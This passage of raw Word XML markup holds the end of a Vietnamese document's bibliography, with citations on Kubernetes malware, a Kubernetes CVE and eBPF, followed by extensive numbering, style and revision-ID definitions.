                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0B96C96D" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[17] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="32BA1DF6" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. Prizmant, “Siloscape: Malware Targeting Kubernetes,” trong </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Siloscape: Malware Targeting Kubernetes</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="76F5CB6F" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="37CA519D" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[18] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="67A9C4F5" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>NVD, “CVE-2020-8554: Kubernetes MitM Vulnerability,” NIST, 2020.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="0056158A" w14:paraId="2B0C2568" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="2116901980"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4E8A58C2" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[19] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2C7BF8FF" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">H. Sharaf, I. Ahmad và T. Dimitriou, “Extended Berkeley Packet Filter: An Application Perspective,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">IEEE Access, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">p. 35, 2022. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
            </w:tbl>
            <w:p w14:paraId="0C03C74C" w14:textId="77777777" w:rsidR="0056158A" w:rsidRDefault="0056158A">
              <w:pPr>
                <w:divId w:val="2116901980"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
            </w:p>
            <w:p w14:paraId="6B38F9D9" w14:textId="48C9AA3B" w:rsidR="00044C71" w:rsidRPr="00026BE1" w:rsidRDefault="00044C71" w:rsidP="00026BE1">
              <w:pPr>
                <w:ind w:firstLine="0"/>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:sectPr w:rsidR="00044C71" w:rsidRPr="00026BE1" w:rsidSect="00B64A44">
      <w:footerReference w:type="default" r:id="rId54"/>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11909" w:h="16834" w:code="9"/>
      <w:pgMar w:top="1985"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87C0" w14:textId="77777777" w:rsidR="00EF5B87" w:rsidRDefault="00EF5B87" w:rsidP="001B37E5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5B4957C2" w14:textId="77777777" w:rsidR="00EF5B87" w:rsidRDefault="00EF5B87" w:rsidP="001B3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VnTimeH">
    <w:altName w:val="Times New Roman"/>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141BF" w14:textId="7E085EE5" w:rsidR="00590974" w:rsidRDefault="00590974" w:rsidP="00590974">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="7526983B" w14:textId="77777777" w:rsidR="00B64A44" w:rsidRDefault="00B64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C11DD" w14:textId="77777777" w:rsidR="00EF5B87" w:rsidRDefault="00EF5B87" w:rsidP="001B37E5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1CFDE9EB" w14:textId="77777777" w:rsidR="00EF5B87" w:rsidRDefault="00EF5B87" w:rsidP="001B37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535662"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="6CE818D1" w14:textId="1BA914D4" w:rsidR="00590974" w:rsidRDefault="0059097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624B62" w14:textId="77777777" w:rsidR="00590974" w:rsidRDefault="00590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520920"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="7BD539BC" w14:textId="3A89D2BD" w:rsidR="00A13819" w:rsidRDefault="00A1381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3369AF" w14:textId="77777777" w:rsidR="00A13819" w:rsidRDefault="00A138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B26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B366E6BC"/>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C76655"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="45146FCA"/>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8C3DB7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCEC1E42"/>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216BA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20827E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42129D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9464451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AC490C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36C4505E"/>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F6501"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2D8E386"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="auto"/>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46D1AED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="548E33AE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading1"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="CHƯƠNG %1:"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="auto"/>
        <w:sz w:val="26"/>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294C74F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E714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13DF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D2844AE"/>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C350EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4742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254B73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="904E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70740A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E736B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25559F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F58C9A5C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="585" w:hanging="585"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="6"/>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14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="64142EC9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0630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1D7E55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CAF2609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2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i/>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E52481"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="393C150C"/>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10C274D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D1183AC0"/>
    <w:styleLink w:val="Style1"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="auto"/>
        <w:sz w:val="26"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%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48F73CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CD4D1C2"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="listnor"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="927" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7DAB6A15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10AA906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90210269">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1556508909">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1822768391">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="557060535">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="899941904">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1955209316">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="722020969">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2062047161">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="290791243">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="426971713">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="350184793">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="651452013">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1644920252">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1411123428">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="292255837">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="441998169">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2104568378">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="28648972">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="327025104">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="58322165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7E1"/>
    <w:rsid w:val="000058D7"/>
    <w:rsid w:val="00007893"/>
    <w:rsid w:val="00010541"/>
    <w:rsid w:val="00015B09"/>
    <w:rsid w:val="000164B9"/>
    <w:rsid w:val="00022ADA"/>
    <w:rsid w:val="00026BE1"/>
    <w:rsid w:val="0003159B"/>
    <w:rsid w:val="0003623F"/>
    <w:rsid w:val="00036325"/>
    <w:rsid w:val="00044C71"/>
    <w:rsid w:val="00052DB1"/>
    <w:rsid w:val="000545D3"/>
    <w:rsid w:val="000774CB"/>
    <w:rsid w:val="000A54C5"/>
    <w:rsid w:val="000B07F7"/>
    <w:rsid w:val="000B2A44"/>
    <w:rsid w:val="000C1254"/>
    <w:rsid w:val="000F0BCD"/>
    <w:rsid w:val="000F4AA8"/>
    <w:rsid w:val="001224B7"/>
    <w:rsid w:val="00141D71"/>
    <w:rsid w:val="001430E0"/>
    <w:rsid w:val="0014727F"/>
    <w:rsid w:val="00153447"/>
    <w:rsid w:val="001620D1"/>
    <w:rsid w:val="0017031B"/>
    <w:rsid w:val="001739C4"/>
    <w:rsid w:val="00175415"/>
    <w:rsid w:val="00197171"/>
    <w:rsid w:val="001A486E"/>
    <w:rsid w:val="001B00BF"/>
    <w:rsid w:val="001B37E5"/>
    <w:rsid w:val="001B7593"/>
    <w:rsid w:val="001E0D8C"/>
    <w:rsid w:val="00201D97"/>
    <w:rsid w:val="00204B45"/>
    <w:rsid w:val="00204C0D"/>
    <w:rsid w:val="002052C6"/>
    <w:rsid w:val="00212603"/>
    <w:rsid w:val="00220D25"/>
    <w:rsid w:val="002244F4"/>
    <w:rsid w:val="00240625"/>
    <w:rsid w:val="00286039"/>
    <w:rsid w:val="00286CB3"/>
    <w:rsid w:val="00287933"/>
    <w:rsid w:val="0029187F"/>
    <w:rsid w:val="002A16DE"/>
    <w:rsid w:val="002B05A6"/>
    <w:rsid w:val="002B4188"/>
    <w:rsid w:val="002B4385"/>
    <w:rsid w:val="002B473D"/>
    <w:rsid w:val="002B7D2C"/>
    <w:rsid w:val="002D4461"/>
    <w:rsid w:val="002E595E"/>
    <w:rsid w:val="002F52EA"/>
    <w:rsid w:val="002F69C0"/>
    <w:rsid w:val="003006E9"/>
    <w:rsid w:val="00314655"/>
    <w:rsid w:val="00320CB9"/>
    <w:rsid w:val="003232A1"/>
    <w:rsid w:val="0033130B"/>
    <w:rsid w:val="00335854"/>
    <w:rsid w:val="00363DC8"/>
    <w:rsid w:val="00382B4B"/>
    <w:rsid w:val="003921B6"/>
    <w:rsid w:val="003B15FC"/>
    <w:rsid w:val="003B799D"/>
    <w:rsid w:val="003D0D55"/>
    <w:rsid w:val="003D225F"/>
    <w:rsid w:val="003F402A"/>
    <w:rsid w:val="003F515D"/>
    <w:rsid w:val="00410860"/>
    <w:rsid w:val="004134B2"/>
    <w:rsid w:val="0041519C"/>
    <w:rsid w:val="0041732A"/>
    <w:rsid w:val="00421A84"/>
    <w:rsid w:val="00424259"/>
    <w:rsid w:val="0043452B"/>
    <w:rsid w:val="00452426"/>
    <w:rsid w:val="00453B83"/>
    <w:rsid w:val="00453DD2"/>
    <w:rsid w:val="00465508"/>
    <w:rsid w:val="004708C0"/>
    <w:rsid w:val="00482F63"/>
    <w:rsid w:val="00487E56"/>
    <w:rsid w:val="004908F6"/>
    <w:rsid w:val="00495567"/>
    <w:rsid w:val="004A29AB"/>
    <w:rsid w:val="004C028A"/>
    <w:rsid w:val="004E1A4E"/>
    <w:rsid w:val="004E2336"/>
    <w:rsid w:val="004E27B9"/>
    <w:rsid w:val="004F51CB"/>
    <w:rsid w:val="004F6637"/>
    <w:rsid w:val="004F7BA7"/>
    <w:rsid w:val="00503FC1"/>
    <w:rsid w:val="00504BF4"/>
    <w:rsid w:val="005062A7"/>
    <w:rsid w:val="00507492"/>
    <w:rsid w:val="0053157E"/>
    <w:rsid w:val="00536E2D"/>
    <w:rsid w:val="005415E6"/>
    <w:rsid w:val="00550AE9"/>
    <w:rsid w:val="00551E81"/>
    <w:rsid w:val="0056158A"/>
    <w:rsid w:val="00573972"/>
    <w:rsid w:val="00577391"/>
    <w:rsid w:val="00584585"/>
    <w:rsid w:val="005850AD"/>
    <w:rsid w:val="00586892"/>
    <w:rsid w:val="0059001B"/>
    <w:rsid w:val="00590974"/>
    <w:rsid w:val="00640032"/>
    <w:rsid w:val="00644A4E"/>
    <w:rsid w:val="006522A9"/>
    <w:rsid w:val="006816D5"/>
    <w:rsid w:val="00690E86"/>
    <w:rsid w:val="00692AD6"/>
    <w:rsid w:val="006936EF"/>
    <w:rsid w:val="00695A6C"/>
    <w:rsid w:val="00695BEE"/>
    <w:rsid w:val="006C20D6"/>
    <w:rsid w:val="006C7148"/>
    <w:rsid w:val="006F4E96"/>
    <w:rsid w:val="00704A61"/>
    <w:rsid w:val="00724A16"/>
    <w:rsid w:val="00727378"/>
    <w:rsid w:val="00727AA1"/>
    <w:rsid w:val="007519A0"/>
    <w:rsid w:val="00771EDA"/>
    <w:rsid w:val="007922E0"/>
    <w:rsid w:val="007A2D34"/>
    <w:rsid w:val="007B6ECE"/>
    <w:rsid w:val="007B7717"/>
    <w:rsid w:val="007C7221"/>
    <w:rsid w:val="007E38B5"/>
    <w:rsid w:val="007E520D"/>
    <w:rsid w:val="007E65A2"/>
    <w:rsid w:val="007E7109"/>
    <w:rsid w:val="007F5C24"/>
    <w:rsid w:val="007F6794"/>
    <w:rsid w:val="007F6886"/>
    <w:rsid w:val="007F7951"/>
    <w:rsid w:val="008055DA"/>
    <w:rsid w:val="00811D56"/>
    <w:rsid w:val="00813D9B"/>
    <w:rsid w:val="00824775"/>
    <w:rsid w:val="00826F7F"/>
    <w:rsid w:val="008270F1"/>
    <w:rsid w:val="00835A55"/>
    <w:rsid w:val="00841FE2"/>
    <w:rsid w:val="0084767F"/>
    <w:rsid w:val="008476AD"/>
    <w:rsid w:val="00863D2F"/>
    <w:rsid w:val="00864F73"/>
    <w:rsid w:val="00872074"/>
    <w:rsid w:val="00884516"/>
    <w:rsid w:val="008A233C"/>
    <w:rsid w:val="008A2D29"/>
    <w:rsid w:val="008B11B6"/>
    <w:rsid w:val="008B7CDE"/>
    <w:rsid w:val="008C6FBD"/>
    <w:rsid w:val="008D58A8"/>
    <w:rsid w:val="008E01AC"/>
    <w:rsid w:val="008F6945"/>
    <w:rsid w:val="00930E2F"/>
    <w:rsid w:val="009410DD"/>
    <w:rsid w:val="00972A87"/>
    <w:rsid w:val="009823E1"/>
    <w:rsid w:val="0099472A"/>
    <w:rsid w:val="009B7F07"/>
    <w:rsid w:val="009C2F83"/>
    <w:rsid w:val="009C47F1"/>
    <w:rsid w:val="009C66BE"/>
    <w:rsid w:val="009D67A9"/>
    <w:rsid w:val="009D772B"/>
    <w:rsid w:val="009E0111"/>
    <w:rsid w:val="009E54E1"/>
    <w:rsid w:val="009F2546"/>
    <w:rsid w:val="00A01053"/>
    <w:rsid w:val="00A04E7A"/>
    <w:rsid w:val="00A13819"/>
    <w:rsid w:val="00A30404"/>
    <w:rsid w:val="00A811F9"/>
    <w:rsid w:val="00A95152"/>
    <w:rsid w:val="00A955A0"/>
    <w:rsid w:val="00A977E1"/>
    <w:rsid w:val="00AA5398"/>
    <w:rsid w:val="00AB432D"/>
    <w:rsid w:val="00AB6FDD"/>
    <w:rsid w:val="00AC278E"/>
    <w:rsid w:val="00AC5DF6"/>
    <w:rsid w:val="00AD11E6"/>
    <w:rsid w:val="00AD1E49"/>
    <w:rsid w:val="00AE74B2"/>
    <w:rsid w:val="00AF3C80"/>
    <w:rsid w:val="00AF5059"/>
    <w:rsid w:val="00B04D60"/>
    <w:rsid w:val="00B17882"/>
    <w:rsid w:val="00B427E4"/>
    <w:rsid w:val="00B50454"/>
    <w:rsid w:val="00B56A24"/>
    <w:rsid w:val="00B64A44"/>
    <w:rsid w:val="00B70927"/>
    <w:rsid w:val="00BA30FA"/>
    <w:rsid w:val="00BA51C8"/>
    <w:rsid w:val="00BD7450"/>
    <w:rsid w:val="00C05E16"/>
    <w:rsid w:val="00C12A4C"/>
    <w:rsid w:val="00C20F4D"/>
    <w:rsid w:val="00C254C6"/>
    <w:rsid w:val="00C32400"/>
    <w:rsid w:val="00C34454"/>
    <w:rsid w:val="00C42C6C"/>
    <w:rsid w:val="00C44487"/>
    <w:rsid w:val="00C50BFB"/>
    <w:rsid w:val="00C5162B"/>
    <w:rsid w:val="00C51B4A"/>
    <w:rsid w:val="00C548AC"/>
    <w:rsid w:val="00C5561B"/>
    <w:rsid w:val="00C673C6"/>
    <w:rsid w:val="00C7275D"/>
    <w:rsid w:val="00C77A90"/>
    <w:rsid w:val="00C813EA"/>
    <w:rsid w:val="00C9186E"/>
    <w:rsid w:val="00C973DC"/>
    <w:rsid w:val="00CA296C"/>
    <w:rsid w:val="00CA45BC"/>
    <w:rsid w:val="00CA7D20"/>
    <w:rsid w:val="00CB2369"/>
    <w:rsid w:val="00CB3206"/>
    <w:rsid w:val="00CB5DB7"/>
    <w:rsid w:val="00CB76EB"/>
    <w:rsid w:val="00CD7999"/>
    <w:rsid w:val="00CD79CE"/>
    <w:rsid w:val="00CE45D9"/>
    <w:rsid w:val="00CE751E"/>
    <w:rsid w:val="00D007B0"/>
    <w:rsid w:val="00D10B4E"/>
    <w:rsid w:val="00D124E1"/>
    <w:rsid w:val="00D27793"/>
    <w:rsid w:val="00D2786A"/>
    <w:rsid w:val="00D345B6"/>
    <w:rsid w:val="00D36A34"/>
    <w:rsid w:val="00D37F05"/>
    <w:rsid w:val="00D64E0A"/>
    <w:rsid w:val="00D666FE"/>
    <w:rsid w:val="00D709F1"/>
    <w:rsid w:val="00D70A7B"/>
    <w:rsid w:val="00D81B1F"/>
    <w:rsid w:val="00D94C11"/>
    <w:rsid w:val="00DB467F"/>
    <w:rsid w:val="00DD1DE0"/>
    <w:rsid w:val="00DE21B5"/>
    <w:rsid w:val="00DE4E85"/>
    <w:rsid w:val="00DF5075"/>
    <w:rsid w:val="00E07FBD"/>
    <w:rsid w:val="00E15D80"/>
    <w:rsid w:val="00E2379C"/>
    <w:rsid w:val="00E43C40"/>
    <w:rsid w:val="00E45A5B"/>
    <w:rsid w:val="00E515F0"/>
    <w:rsid w:val="00E561CB"/>
    <w:rsid w:val="00E57538"/>
    <w:rsid w:val="00E637A2"/>
    <w:rsid w:val="00E67F80"/>
    <w:rsid w:val="00E91F60"/>
    <w:rsid w:val="00E96BDF"/>
    <w:rsid w:val="00E96D31"/>
    <w:rsid w:val="00EA079F"/>
    <w:rsid w:val="00EB7207"/>
    <w:rsid w:val="00EC57E6"/>
    <w:rsid w:val="00EC7C59"/>
    <w:rsid w:val="00EE289D"/>
    <w:rsid w:val="00EE4545"/>
    <w:rsid w:val="00EE77B1"/>
    <w:rsid w:val="00EF5B87"/>
    <w:rsid w:val="00F133F0"/>
    <w:rsid w:val="00F14759"/>
    <w:rsid w:val="00F22E93"/>
    <w:rsid w:val="00F33296"/>
    <w:rsid w:val="00F334B9"/>
    <w:rsid w:val="00F51078"/>
    <w:rsid w:val="00F5457E"/>
    <w:rsid w:val="00F64263"/>
    <w:rsid w:val="00F7146E"/>
    <w:rsid w:val="00F87DE3"/>
    <w:rsid w:val="00FA6802"/>
    <w:rsid w:val="00FB3175"/>
    <w:rsid w:val="00FB31EF"/>
    <w:rsid w:val="00FB4AA9"/>
    <w:rsid w:val="00FC61AA"/>
    <w:rsid w:val="00FD7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8172E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{35F7B6EE-D8B4-4054-AC37-EDF94866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8B5"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="567"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00EB7207"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FD7DC1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="7"/>
      </w:numP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70A7B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="7"/>
